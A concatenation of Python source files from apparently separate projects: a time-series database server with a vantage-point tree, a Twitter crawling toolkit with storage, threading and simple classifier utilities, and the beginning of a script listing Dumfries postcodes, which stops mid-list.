data = np.random.rand(200)
dataDict = {}
for i in range(len(data)):
dataDict['key'+str(i+1)] = data[i]
allPk = list(dataDict.keys())
testvps = ['key7', 'key10', 'key45', 'key73']
#creating distance function
def absdist(VP,allPk):
"""
Implementing basic absolute distance function
"""
x = dataDict[VP]
y = np.array([dataDict[key] for key in allPk])
return np.abs(x-y)
tree = VPtree(allPk, testvps, absdist)
vpt = tree.gen_graph()
def dist(vp,arg):
x = dataDict[vp]
return np.abs(x-arg)
search_val = np.random.normal(0,5)
allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk])
subset = tree.gen_subset(search_val,dist)
closest = min(allPk, key = lambda k:allDists[allPk.index(k)])
assert closest in subset
```
#### File: cs207project/tsdb/tsdb_server.py
```python
import asyncio
from .dictdb import DictDB
from importlib import import_module
from collections import defaultdict, OrderedDict
from .tsdb_serialization import Deserializer, serialize
from .tsdb_error import *
from .tsdb_ops import *
import procs
import json
import ast
from aiohttp import web
def trigger_callback_maker(pk, target, calltomake):
def callback_(future):
result = future.result()
if target is not None:
calltomake(pk, dict(zip(target, result)))
return result
return callback_
class TSDBProtocol(asyncio.Protocol):
def __init__(self, server):
self.server = server
self.deserializer = Deserializer()
self.futures = []
def _insert_ts(self, op):
try:
self.server.db.insert_ts(op['pk'], op['ts'])
except ValueError as e:
return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op'])
self._run_trigger('insert_ts', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _delete_ts(self, op):
try:
self.server.db.delete_ts(op['pk'])
except ValueError as e:
return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op'])
self._run_trigger('delete_ts', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _upsert_meta(self, op):
self.server.db.upsert_meta(op['pk'], op['md'])
self._run_trigger('upsert_meta', [op['pk']])
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _select(self, op):
loids, fields = self.server.db.select(op['md'], op['fields'], op['additional'])
self._run_trigger('select', loids)
if fields is not None:
d = OrderedDict(zip(loids, fields))
return TSDBOp_Return(TSDBStatus.OK, op['op'], d)
else:
d = OrderedDict((k,{}) for k in loids)
return TSDBOp_Return(TSDBStatus.OK, op['op'], d)
def _augmented_select(self, op):
"run a select and then synchronously run some computation on it"
loids, fields = self.server.db.select(op['md'], None, op['additional'])
proc = op['proc'] # the module in procs
arg = op['arg'] # an additional argument, could be a constant
target = op['target'] #not used to upsert any more, but rather to
# return results in a dictionary with the targets mapped to the return
# values from proc_main
mod = import_module('procs.'+proc)
storedproc = getattr(mod,'proc_main')
results=[]
for pk in loids:
row = self.server.db.rows[pk]
result = storedproc(pk, row, arg)
results.append(dict(zip(target, result)))
return TSDBOp_Return(TSDBStatus.OK, op['op'], dict(zip(loids, results)))
def _add_trigger(self, op):
print('Adding triggers')
trigger_proc = op['proc'] # the module in procs
trigger_onwhat = op['onwhat'] # on what? eg `insert_ts`
trigger_target = op['target'] # if provided, this meta will be upserted
trigger_arg = op['arg'] # an additional argument, could be a constant
# FIXME: this import should have error handling
mod = import_module('procs.'+trigger_proc)
storedproc = getattr(mod,'main')
self.server.triggers[trigger_onwhat].append((trigger_proc, storedproc, trigger_arg, trigger_target))
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _remove_trigger(self, op):
trigger_proc = op['proc']
trigger_onwhat = op['onwhat']
trigs = self.server.triggers[trigger_onwhat]
for t in trigs:
if t[0]==trigger_proc:
trigs.remove(t)
return TSDBOp_Return(TSDBStatus.OK, op['op'])
def _run_trigger(self, opname, rowmatch):
lot = self.server.triggers[opname]
print("S> list of triggers to run", lot)
for tname, t, arg, target in lot:
for pk in rowmatch:
row = self.server.db.rows[pk]
task = asyncio.ensure_future(t(pk, row, arg))
task.add_done_callback(trigger_callback_maker(pk, target, self.server.db.upsert_meta))
def connection_made(self, conn):
print('S> connection made')
self.conn = conn
def data_received(self, data):
print('S> data received ['+str(len(data))+']: '+str(data))
self.deserializer.append(data)
if self.deserializer.ready():
msg = self.deserializer.deserialize()
status = TSDBStatus.OK # until proven otherwise.
response = TSDBOp_Return(status, None) # until proven otherwise.
try:
op = TSDBOp.from_json(msg)
except TypeError as e:
response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None)
if status is TSDBStatus.OK:
if isinstance(op, TSDBOp_InsertTS):
response = self._insert_ts(op)
elif isinstance(op, TSDBOp_DeleteTS):
response = self._delete_ts(op)
elif isinstance(op, TSDBOp_UpsertMeta):
response = self._upsert_meta(op)
elif isinstance(op, TSDBOp_Select):
response = self._select(op)
elif isinstance(op, TSDBOp_AddTrigger):
response = self._add_trigger(op)
elif isinstance(op, TSDBOp_RemoveTrigger):
response = self._remove_trigger(op)
else:
response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op'])
self.conn.write(serialize(response.to_json()))
self.conn.close()
def connection_lost(self, transport):
print('S> connection lost')
def rest_hello_world(self, request):
return web.Response(body=b"Hello world")
#@rest_handler
@asyncio.coroutine
def post_handler(self, request):
data = yield from request.json()
status = TSDBStatus.OK # until proven otherwise.
response = TSDBOp_Return(status, None) # until proven otherwise.
msg = data
try:
op = TSDBOp.from_json(msg)
except TypeError as e:
response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None)
if status is TSDBStatus.OK:
if isinstance(op, TSDBOp_InsertTS):
response = self._insert_ts(op)
elif isinstance(op, TSDBOp_DeleteTS):
response = self._delete_ts(op)
elif isinstance(op, TSDBOp_UpsertMeta):
response = self._upsert_meta(op)
elif isinstance(op, TSDBOp_Select):
response = self._select(op)
elif isinstance(op, TSDBOp_AddTrigger):
response = self._add_trigger(op)
elif isinstance(op, TSDBOp_RemoveTrigger):
response = self._remove_trigger(op)
else:
response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op'])
return web.json_response(response.to_json())
class TSDBServer(object):
def __init__(self, db, port=9999):
self.port = port
self.db = db
self.triggers = defaultdict(list)
self.autokeys = {}
def exception_handler(self, loop, context):
print('S> EXCEPTION:', str(context))
loop.stop()
def run(self, testing=False):
loop = asyncio.get_event_loop()
# NOTE: enable this if you'd rather have the server stop on an error
# currently it dumps the protocol and keeps going; new connections
# are unaffected. Rather nice, actually.
#loop.set_exception_handler(self.exception_handler)
self.listener = loop.create_server(lambda: TSDBProtocol(self), '127.0.0.1', self.port)
print('S> Starting TSDB server on port',self.port)
listener = loop.run_until_complete(self.listener)
try:
loop.run_forever()
except KeyboardInterrupt:
print('S> Exiting.')
except Exception as e:
print('S> Exception:',e)
finally:
listener.close()
loop.close()
def rest_run(self):
loop = asyncio.get_event_loop()
app = web.Application()
tsdbproc = TSDBProtocol(self)
app.router.add_route('GET', '/', tsdbproc.rest_hello_world)
app.router.add_route('POST', '/', tsdbproc.post_handler)
self.listener = loop.create_server(app.make_handler(), '127.0.0.1', self.port)
print('S> Starting REST TSDB server on port',self.port)
listener = loop.run_until_complete(self.listener)
try:
loop.run_forever()
except KeyboardInterrupt:
print('S> Exiting.')
except Exception as e:
print('S> Exception:',e)
finally:
listener.close()
loop.close()
if __name__=='__main__':
empty_schema = {'pk': {'convert': lambda x: x, 'index': None}}
db = DictDB(empty_schema, 'pk')
TSDBServer(db).run()
```
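The trigger machinery above schedules a stored procedure per matching row with asyncio.ensure_future and attaches a done-callback (built by trigger_callback_maker) that zips the procedure's results against the target field names before upserting. A minimal standalone sketch of that pattern, with illustrative names only:
```python
import asyncio

def make_callback(pk, targets, upsert):
    def _cb(future):
        upsert(pk, dict(zip(targets, future.result())))
    return _cb

async def fake_proc(pk, row, arg):
    # stand-in for a procs module: returns one value per target field
    return [sum(row) / len(row), max(row) - min(row)]   # e.g. a mean and a range

async def demo():
    results = {}
    task = asyncio.ensure_future(fake_proc('ts-1', [1.0, 2.0, 3.0], None))
    task.add_done_callback(make_callback('ts-1', ['mean', 'range'],
                                         lambda pk, md: results.update({pk: md})))
    await task
    await asyncio.sleep(0)            # let the scheduled done-callback run
    return results

print(asyncio.run(demo()))            # {'ts-1': {'mean': 2.0, 'range': 2.0}}
```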
#### File: cs207project/vptree/vptree.py
```python
import uuid
import numpy as np
import graphviz as gv
class vpnode():
def __init__(self):
self.parent = None
self.leftChild = None
self.rightChild = None
#Using preorder in a similar way as the lab
#returns a list and not a generator object
def preorder(self):
if self.rightChild == None and self.leftChild == None:
return [(self, None, None)]
else:
return [(self, self.leftChild, self.rightChild)] + self.leftChild.preorder() + self.rightChild.preorder()
#A VP tree has two kinds of nodes - non-leaf nodes holding vantage points and leaf nodes holding the closest possible candidates.
class vpnodeVP(vpnode):
"""
Intermediate nodes with vantage points
"""
def __init__(self, uid, pk, median, leftChild, rightChild):
"""
pk - future input from timeseries
- currently the id for the test timeseries
"""
#Inheriting from the base class
super().__init__()
self.uid = uid
self.pk = pk
self.median = median
self.leftChild = leftChild
self.rightChild = rightChild
class vpnodeLeaf(vpnode):
"""
Leaf nodes with primary key lists with the closest matches
"""
def __init__(self, uid, pkList):
super().__init__()
self.uid = uid
self.pkList = pkList
#Building the tree class
class VPtree():
"""
Main tree class
"""
def __init__(self, allPk, vpList, dfunc):
"""
allPK - List of all primary keys
vpList - List of vantage points
dfunc - distance function
"""
self.vpList = vpList
self.dfunc = dfunc
self.root = self.maketree(allPk, vpList)
def maketree(self, allPk, vpList):
#Making an id for the node:
uid = uuid.uuid4().int % 10000
#checking if there are vantage points left
#if we have none left, it's just a vpnodeLeaf node
if vpList == []:
return vpnodeLeaf(uid, allPk)
else:
#Decide how to pick vantage point
#Currently using random selection
index = np.random.choice(range(len(vpList)))
VP = vpList[index]
#Computing distance for all points
VPdist = self.dfunc(VP, allPk)
median = np.median(VPdist)
#Assigning if left or right
#initializing empty lists
left_PK, left_VP, right_PK, right_VP = [], [], [], []
for key, dist in zip(allPk, VPdist):
if dist < median : #assigning left
left_PK.append(key)
if key in vpList and key != VP:
#add the key to vantage key list
left_VP.append(key)
else:
right_PK.append(key)
if key in vpList and key != VP:
#add key to vantage key list
right_VP.append(key)
leftChild = self.maketree(left_PK, left_VP)
rightChild = self.maketree(right_PK, right_VP)
#creating root node
node = vpnodeVP(uid, VP, median, leftChild, rightChild)
#setting parents
rightChild.parent = node
leftChild.parent = node
return node
def gen_graph(self):
"""
Visualize the tree
"""
graph = gv.Digraph(format='svg')
for parent, leftChild, rightChild in self.root.preorder():
if isinstance(parent,vpnodeLeaf):
graph.node(str(parent.uid), "Leaf:: "+str(parent.pkList))
if isinstance(parent,vpnodeVP):
graph.node(str(parent.uid), """Vantage point:: Key={} medianDist = {:3.3f}
""".format(parent.pk, parent.median))
graph.edge(str(parent.uid), str(leftChild.uid))
graph.edge(str(parent.uid), str(rightChild.uid))
return graph
def gen_subset(self, search_val, dfunc):
"""Get the subset of nodes that can be the closest to this argument
INPUT
search_val - search value
dfunc - distance function
"""
current = self.root
while not isinstance(current,vpnodeLeaf):
d = dfunc(current.pk, search_val)
if d > current.median:
current = current.rightChild
else:
current = current.leftChild
return current.pkList
"""
if __name__ == "__main__":
data = np.random.rand(200)
dataDict = {}
for i in range(len(data)):
dataDict['key'+str(i+1)] = data[i]
allPk = list(dataDict.keys())
testvps = ['key7', 'key10', 'key45', 'key73']
#creating distance function
def absdist(VP,allPk):
#Implementing basic absolute distance function
x = dataDict[VP]
y = np.array([dataDict[key] for key in allPk])
return np.abs(x-y)
tree = VPtree(allPk, testvps, absdist)
vpt = tree.gen_graph()
vpt.render("vptree.gv")
def dist(vp,arg):
x = dataDict[vp]
return np.abs(x-arg)
search_val = np.random.normal(0,5)
allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk])
subset = tree.gen_subset(search_val,dist)
closest = min(allPk, key = lambda k:allDists[allPk.index(k)])
assert closest in subset
"""
``` |
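gen_subset above walks a single branch per level and returns the leaf the query falls into. A textbook VP-tree nearest-neighbour query additionally backtracks into the far branch whenever the best radius found so far still straddles the median boundary. Below is a minimal standalone sketch of that pruning rule using plain tuples for nodes; the names and toy tree are illustrative and this is not the vptree module's API.
```python
def nn_search(node, query, dist, best=(None, float('inf'))):
    if node[0] == 'leaf':                          # ('leaf', [keys...])
        for key in node[1]:
            d = dist(key, query)
            if d < best[1]:
                best = (key, d)
        return best
    _, vp, median, left, right = node              # ('vp', key, median, left, right)
    d = dist(vp, query)
    if d < best[1]:
        best = (vp, d)
    near, far = (left, right) if d < median else (right, left)
    best = nn_search(near, query, dist, best)
    if abs(d - median) < best[1]:                  # the far side may still hold a closer point
        best = nn_search(far, query, dist, best)
    return best

tree = ('vp', 0.5, 0.25, ('leaf', [0.4, 0.6]), ('leaf', [0.1, 0.9]))
print(nn_search(tree, 0.85, lambda a, b: abs(a - b)))   # (0.9, ~0.05)
```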
{
"source": "2087829p/smores",
"score": 3
} |
#### File: smores/smores/storage.py
```python
__author__ = '<NAME>'
import os
import pickle
import time
import threading
import constants
from concurrent import futures
import Queue
def __abs_path__(fl):
curr_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
abs_file_path = os.path.join(curr_dir, fl)
return abs_file_path
def load_data(f):
data = []
file_path = __abs_path__(f)
if not os.path.exists(file_path):
open(file_path, 'w+').close()
return data
with open(file_path, 'rb') as handle:
try:
data = pickle.load(handle)
except Exception as e:
print "error while opening file " + f + ' cause: ' + e.message
return data
def save_data(data, fl, append=False):
if constants.TESTING:
return
file_path = __abs_path__(fl)
if not os.path.exists(os.path.dirname(file_path)):
try:
os.makedirs(os.path.dirname(file_path))
except:
print "could not create missing directory"
return
if append:
data += load_data(fl)
with open(file_path, 'wb') as handle:
try:
pickle.dump(data, handle)
except Exception as e:
print "could not save data to file %s cause: %s" % (fl,e.message)
def load_explorer_data():
import constants as c
bulk_lists=load_data(c.TWITTER_BULK_LIST_STORAGE)
lists = load_data(c.TWITTER_LIST_STORAGE)
users = load_data(c.TWITTER_USER_STORAGE)
remaining = load_data(c.TWITTER_CANDIDATES_STORAGE)
data={'remaining':remaining if remaining else[],
'bulk_lists': bulk_lists if bulk_lists else [],
'total_followed': users if users else [],
'user_lists': lists if lists else []}
return data
class Format_Error(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def read_login(f):
data = []
file_path = __abs_path__(f)
if not os.path.exists(file_path):
open(file_path, 'w').close()
return data
with open(file_path, 'r') as handle:
content = handle.readlines()
for l in content:
data_entry = {}
l = l.strip('\n')
l = l.strip("[]")
entry = l.split(',')
for e in entry:
d = e.split(":")
if (len(d) != 2):
raise Format_Error("Unable to parse credentials file due to error in formatting")
data_entry[d[0]] = d[1]
data.append(data_entry)
return data
def save_candidates(candidates):
save_data(candidates,constants.TWITTER_CANDIDATES_STORAGE)
# 1 db per day
# 1 collection per hour
# as many tweets as possible aka documents
# if time == available then https://www.sitepoint.com/caching-a-mongodb-database-with-redis/
class StorageSystem:
def __init__(self, ip, port, thread_count):
self.ip = ip
self.port = port
self._current_db = time.strftime("%x") # sets the name of the current db to the current date
self._current_collection = time.strftime(
"%X") # set the current collection to the current time aka current hour
self._pool = futures.ThreadPoolExecutor(max_workers=thread_count)
# NEVER TO BE CALLED BY ANYONE BUT SCHEDULER
def switch_db_context(self):
self._current_db = time.strftime("%x")
# TO BE USED ONLY FOR TESTING
def set_db_context(self, c):
self._current_db = c
# NOT TO BE CALLED BY USER MUST BE CALLED ONLY BY SCHEDULER
def switch_collection_context(self):
self._current_collection = time.strftime("%X")
def __perform_write__(self, data, ip, port, **kwargs):
'Write the new data to the specified server'
import pymongo
try:
mongo = pymongo.MongoClient(ip, port)
db = mongo[kwargs['current_db']]
db[kwargs['current_collection']].insert_many(data, False)
mongo.close()
except:
raise ValueError('MongoDB server ' + ip + ':' + str(port)
+ ' endpoint data is incorrect or server is down')
def write(self, data):
'Enqueue data that the storage system will attempt to save'
self._pool.submit(self.__perform_write__,
data, self.ip,
self.port,
current_db=self._current_db,
current_collection=self._current_collection)
def shutdown(self):
print "Storage system is shutting down please wait for all pending IO tasks to complete"
self._pool.shutdown(True)
# http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Condition_Objects_Producer_Consumer.php
class Filter(threading.Thread):
# service specifies which task's results should be fed to this filter; refer to the service plugins in constants.py
def __init__(self, service, store, filters):
threading.Thread.__init__(self)
self._for = service
self._data = Queue.Queue()
self._store = store
self._plugins = filters
self._cond = threading.Condition()
self._lock = threading.Lock()
self.daemon = True
self._running = True
# self.start()
def set_store(self, store):
self._store = store
def data_available(self, data):
'Notify the plugin that new data is available for processing'
self._data.put(data)
with self._lock:
with self._cond:
self._cond.notify()
def start(self):
threading.Thread.start(self)
if not self._plugins:
return
for p in self._plugins:
p.start()
def interrupt(self):
'Terminate plugin and its pipeline'
with self._lock:
self._running = False
with self._cond:
self._cond.notify()
if self._plugins:
for p in self._plugins:
p.interrupt()
def register_plugin(self, p):
'Add new plugin to the end of the pipeline'
if isinstance(p, Filter):
self._plugins.append(p)
def run(self):
while self._running:
while not self._data.empty():
data = self.process(self._data.get())
self._data.task_done()
if self._store:
self._store(data)
if self._plugins:
for p in self._plugins:
p.data_available(data)
with self._cond:
if self._running and self._data.empty():
self._cond.wait()
def process(self, data):
'Processes the input data must be overridden and implemented in every class that subclasses this one'
raise NotImplementedError()
```
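Filter above is one threaded stage of a producer/consumer pipeline: subclasses override process(), the result goes to the store callable and is forwarded to any downstream plugins. A minimal standalone Python 3 sketch of the same pattern (illustrative names, not the smores implementation):
```python
import queue
import threading

class Stage(threading.Thread):
    """One pipeline stage: consume items, process them, store and forward results."""
    def __init__(self, store=None, downstream=None):
        super().__init__(daemon=True)
        self.inbox = queue.Queue()
        self.store = store
        self.downstream = downstream or []

    def data_available(self, item):
        self.inbox.put(item)

    def run(self):
        while True:
            item = self.inbox.get()
            if item is None:               # sentinel: shut the stage down
                break
            out = self.process(item)
            if self.store:
                self.store(out)
            for d in self.downstream:
                d.data_available(out)

    def process(self, item):
        raise NotImplementedError

class Upper(Stage):
    def process(self, item):
        return item.upper()

results = []
stage = Upper(store=results.append)
stage.start()
stage.data_available("hello")
stage.data_available(None)                 # sentinel ends the stage
stage.join()
print(results)                             # ['HELLO']
```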
#### File: smores/smores/utils.py
```python
__author__ = '<NAME>'
import threading
import numpy as np
from constants import *
import math
import time
import constants as c
def split_into(l, n):
'Splits the list into smaller lists with n elements each'
for i in xrange(0, len(l), n):
yield l[i:i + n]
def fit_in_range(min, max, x):
"""fits a number(x) within a specified range between min and max"""
return (x - min) / (max - min)
# converts a twitter timestamp to system time in seconds since the Unix epoch
get_tweet_timestamp = lambda t:time.mktime(time.strptime(t["created_at"], "%a %b %d %H:%M:%S +0000 %Y"))
# flattens a multidimensional array into a 1-dimensional array
flatten = lambda l: [i for sl in l for i in sl]
# removes Twitter accounts that are protected or have too few tweets to be deemed active
user_filter = lambda x:filter(lambda y:y['protected']==False and y['statuses_count']>c.MIN_TWITTER_STATUSES_COUNT,x)
# a handy functional expression to check whether the trends payload is actual trend data or a list of locations for which trends are wanted
contains_locations = lambda x: isinstance(x, list) and any(
[('location' in i or 'woeid' in i or 'lat' in i or 'long' in i) for i in x])
# determines whether a string contains only ascii characters
all_ascii = lambda x:all(ord(c) < 128 for c in x)
class KMeanClassifier:
def __init__(self):
self._pos = [1.0 for _ in xrange(RUNNING_CYCLE)]
self._pos_size = 0
self._neg = [1.0 for _ in xrange(RUNNING_CYCLE)]
self._neg_size = 0
def train(self, s, r): #s-sample,r-result what we've actually observed
s = np.log(s)
if r == 1:
# train positive classifier
self._pos_size += 1
self._pos = map(lambda m, x: m + ((x - m) / self._pos_size), self._pos, s)
else:
# train negative classifier
self._neg_size += 1
self._neg = map(lambda m, x: m + ((x - m) / self._neg_size), self._neg, s)
def __dist__(self, x, y):
return np.sqrt((x - y) ** 2)
def predict(self, s):
s = np.log(s)
gamma = 1.0
return np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._pos)]) \
/ np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._neg)])
class NeuralNetwork:
def __init__(self, num_inputs, num_outputs,mlp=False):
self._size_in = num_inputs
self._size_out = num_outputs
if not mlp:
self._w = [self.__gen_layer__(num_inputs,num_outputs)]
self._setup = True
else:
self._setup = False
self._w = []
def __gen_layer__(self, in_size, out_size):
return 2 * np.random.random((in_size, out_size)) - 1
def add_hidden_layer(self, num_neurons):
if not self._w:
self._w.append(self.__gen_layer__(self._size_in, num_neurons))
else:
self._w.append(self.__gen_layer__(self._w[-1].shape[1], num_neurons))
def __sigmoid__(self, x, deriv=False):
if (deriv == True):
return x * (1 - x)
return 1 / (1 + np.exp(-x))
def train(self, X, y, epochs=1): #X-input,y-observed result
if not self._w:
self._w.append(self.__gen_layer__(self._size_in, self._size_out))
self._setup = True
elif not self._setup:
self._w.append(self.__gen_layer__(self._w[-1].shape[1], self._size_out))
self._setup = True
for i in xrange(epochs):
# propagate forward
l0 = X
l1 = [l0]
for l in range(len(self._w)):
l0 = self.__sigmoid__(np.dot(l0, self._w[l]))
l1.append(l0)
err = y - l0 #calculate error
delta = err * self.__sigmoid__(l0, True)#calculate the gradient of the error for the output layer
if len(self._w) > 1:
self._w[-1] += l1[-2].T.dot(delta) #update the output layer's weights using the last hidden activation
for j in xrange(len(self._w) - 2, -1, -1):
l_err = delta.dot(self._w[j+1].T)#propagate the error back through layer j+1
l_delta = l_err * self.__sigmoid__(l1[j+1], deriv=True)#gradient at layer j's output activation
self._w[j] += l1[j].T.dot(l_delta)#update layer j's weights with its input activation
delta = l_delta # remember the gradient so we can reuse it for the next layer back
else:
self._w[-1] += np.dot(l1[0].T, delta)
def predict(self, X):
lo = X
for l in xrange(len(self._w)):
lo = self.__sigmoid__(np.dot(lo, self._w[l]))
return lo
class CrawlTimer(threading.Thread):
# ref:http://stackoverflow.com/questions/9812344/cancellable-threading-timer-in-python
def __init__(self, wait_for, function, **kwargs):
threading.Thread.__init__(self)
self.event = threading.Event()
self.fs = [(function, kwargs)] if function else []
self.timeout = wait_for
def add_function(self, f, **kwargs):
self.fs.append((f, kwargs))
def run(self):
while not self.event.is_set():
for i in range(len(self.fs)):
fx = self.fs[i]
if fx[1]:
fx[0](fx[1])
else:
fx[0]()
self.event.wait(self.timeout)
def stop(self):
self.event.set()
``` |
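NeuralNetwork above implements a small sigmoid MLP trained by backpropagation. A compact standalone Python 3 sketch of the same pattern on XOR (illustrative names, not the smores class):
```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

rng = np.random.RandomState(1)
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
y = np.array([[0], [1], [1], [0]], dtype=float)

w0 = 2 * rng.random((2, 4)) - 1                # input -> hidden weights
w1 = 2 * rng.random((4, 1)) - 1                # hidden -> output weights

for _ in range(20000):
    h = sigmoid(X @ w0)                        # forward pass
    out = sigmoid(h @ w1)
    out_delta = (y - out) * out * (1 - out)    # error gradient at the output layer
    h_delta = (out_delta @ w1.T) * h * (1 - h) # backpropagated gradient at the hidden layer
    w1 += h.T @ out_delta                      # update each layer with its input activation
    w0 += X.T @ h_delta

print(np.round(out.ravel(), 2))                # approaches [0, 1, 1, 0]
```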
{
"source": "2090886l/IneqBench",
"score": 3
} |
#### File: IneqBench/TaxBands-Data-and-Script/script.py
```python
import urllib.request
import re
import csv
array = """DG1 1DF
DG1 1DG
DG1 1DJ
DG1 1DL
DG1 1DR
DG1 1DT
DG1 1DU
DG1 1DX
DG1 1EA
DG1 1EB
DG1 1ED
DG1 1EF
DG1 1EG
DG1 1EH
DG1 1EJ
DG1 1EL
DG1 1ET
DG1 1EW
DG1 1EX
DG1 1FA
DG1 1GL
DG1 1GN
DG1 1GP
DG1 1GQ
DG1 1GZ
DG1 1AA
DG1 1AG
DG1 1BA
DG1 1BD
DG1 1BF
DG1 1BG
DG1 1BH
DG1 1BJ
DG1 1BL
DG1 1BS
DG1 1BT
DG1 1BU
DG1 1BW
DG1 1BX
DG1 1BY
DG1 1BZ
DG1 1DA
DG1 1DB
DG1 1DD
DG1 1DE
DG1 1HA
DG1 1HB
DG1 1HD
DG1 1HE
DG1 1HF
DG1 1HH
DG1 1HJ
DG1 1HL
DG1 1HN
DG1 1HP
DG1 1HR
DG1 1HS
DG1 1HU
DG1 1HW
DG1 1HX
DG1 1HY
DG1 1HZ
DG1 1JA
DG1 1JB
DG1 1JD
DG1 1JE
DG1 1JF
DG1 1JG
DG1 1JL
DG1 1JN
DG1 1JP
DG1 1JQ
DG1 1JR
DG1 1JU
DG1 1JW
DG1 1JX
DG1 1JY
DG1 1JZ
DG1 1LG
DG1 1LN
DG1 1LP
DG1 1LR
DG1 1LS
DG1 1LT
DG1 1LU
DG1 1LW
DG1 1LX
DG1 1LZ
DG1 1NA
DG1 1NE
DG1 1NF
DG1 1NH
DG1 1NJ
DG1 1NL
DG1 1NN
DG1 1NP
DG10 9NT
DG10 9NU
DG10 9NW
DG10 9NX
DG10 9PA
DG10 9PB
DG10 9PD
DG10 9PE
DG10 9PF
DG10 9PG
DG10 9PH
DG10 9PJ
DG10 9PL
DG10 9PN
DG10 9PP
DG10 9PQ
DG10 9PR
DG10 9PS
DG10 9PT
DG10 9PU
DG10 9PW
DG10 9PX
DG10 9PY
DG10 9PZ
DG10 9QA
DG10 9QB
DG10 9QF
DG10 9QG
DG10 9QH
DG10 9QJ
DG1 1NQ
DG1 1NR
DG1 1NS
DG1 1NT
DG1 1NW
DG1 1NY
DG1 1NZ
DG1 1PA
DG1 1PB
DG1 1PD
DG1 1PE
DG1 1PF
DG1 1PG
DG1 1PJ
DG1 1PL
DG1 1PP
DG1 1PW
DG1 1PX
DG1 1PZ
DG1 1QA
DG1 1QB
DG1 1QD
DG1 1QE
DG1 1QF
DG1 1QG
DG1 1QH
DG1 1QJ
DG1 1QL
DG1 1QN
DG1 1QP
DG1 1QQ
DG1 1QR
DG1 1QS
DG1 1QU
DG1 1QW
DG1 1QX
DG1 1QY
DG1 1QZ
DG1 1RA
DG1 1RB
DG1 1RD
DG1 1RE
DG1 1RF
DG1 1RG
DG1 1RH
DG1 1RJ
DG1 1RL
DG1 1RN
DG1 1RP
DG1 1RQ
DG1 1RR
DG1 1RS
DG1 1RT
DG1 1RU
DG1 1RX
DG1 1RY
DG1 1RZ
DG1 1SA
DG1 1SD
DG1 1SE
DG1 1SF
DG1 1SG
DG1 1SH
DG1 1SJ
DG1 1SL
DG1 1SP
DG1 1SQ
DG1 1SR
DG1 1SS
DG1 1ST
DG1 1SU
DG1 1SW
DG1 1SX
DG1 1SY
DG1 1SZ
DG1 1TA
DG1 1TB
DG1 1TD
DG1 1TE
DG1 1TF
DG1 1TG
DG1 1TH
DG1 1TN
DG1 1TP
DG1 1TQ
DG1 1TR
DG1 1TS
DG1 1TT
DG1 1TU
DG1 1TW
DG1 1TX
DG1 1TY
DG1 1TZ
DG1 1UA
DG1 1UB
DG1 1UD
DG1 1UF
DG1 1UG
DG1 1UH
DG1 1UJ
DG1 1UL
DG1 1UN
DG1 1UP
DG1 1UQ
DG1 1UR
DG1 1US
DG1 1UT
DG1 1UU
DG1 1UW
DG1 1UX
DG1 1UY
DG1 1UZ
DG1 1WD
DG1 1XA
DG1 1XB
DG1 1XD
DG1 1XE
DG1 1XF
DG1 1XG
DG1 1XH
DG1 1XJ
DG1 1XL
DG1 1XN
DG1 1XP
DG1 1XQ
DG1 1XR
DG1 1XS
DG1 1XW
DG1 2AA
DG1 2AB
DG1 2AD
DG1 2AG
DG1 2AH
DG1 2AL
DG1 2AN
DG1 2AP
DG1 2AT
DG1 2AW
DG1 2AX
DG1 2BA
DG1 2BD
DG1 2BG
DG1 2BH
DG1 2BJ
DG1 2BN
DG1 2BQ
DG1 2BS
DG1 2BT
DG1 2BU
DG1 2BY
DG1 2DA
DG1 2DB
DG1 2DD
DG1 2DE
DG1 2DF
DG1 2DL
DG1 2DN
DG1 2DP
DG1 2DR
DG1 2DS
DG1 2DT
DG1 2DU
DG1 2DX
DG1 2DY
DG1 2DZ
DG1 2EB
DG1 2ED
DG1 2EE
DG1 2EF
DG1 2EJ
DG1 2EL
DG1 2EN
DG1 2EP
DG1 2EQ
DG1 2ER
DG1 2ET
DG1 2EU
DG1 2EW
DG1 2EX
DG1 2EY
DG1 2EZ
DG1 2GB
DG1 2HA
DG1 2HB
DG1 2HD
DG1 2HE
DG1 2HF
DG1 2HG
DG1 2HH
DG1 2HJ
DG1 2HL
DG1 2HN
DG1 2HP
DG1 2HQ
DG1 2HR
DG1 2HS
DG1 2HT
DG1 2HU
DG1 2JA
DG1 2JB
DG1 2JD
DG1 2JE
DG1 2JF
DG1 2JG
DG1 2JH
DG1 2JJ
DG1 2JL
DG1 2JN
DG1 2JP
DG1 2JQ
DG1 2JR
DG1 2JS
DG1 2JT
DG1 2JU
DG1 2JW
DG1 2JX
DG1 2JY
DG1 2JZ
DG1 2LA
DG1 2LB
DG1 2LE
DG1 2LF
DG1 2LH
DG1 2LJ
DG1 2LL
DG1 2LP
DG1 2LQ
DG1 2LR
DG1 2LS
DG1 2LT
DG1 2LU
DG1 2LX
DG1 2LZ
DG1 2NJ
DG1 2NN
DG1 2NP
DG1 2NS
DG1 2NT
DG1 2NU
DG1 2NX
DG1 2NZ
DG1 2PA
DG1 2PB
DG1 2PE
DG1 2PF
DG1 2PG
DG1 2PH
DG1 2PJ
DG1 2PL
DG1 2PN
DG1 2PP
DG1 2PQ
DG1 2PR
DG1 2PS
DG1 2PW
DG1 2PX
DG1 2PY
DG1 2PZ
DG1 2QB
DG1 2QD
DG1 2QE
DG1 2QF
DG1 2QG
DG1 2QH
DG1 2QL
DG1 2QN
DG1 2QP
DG1 2QQ
DG1 2QR
DG1 2QS
DG1 2QT
DG1 2RA
DG1 2RB
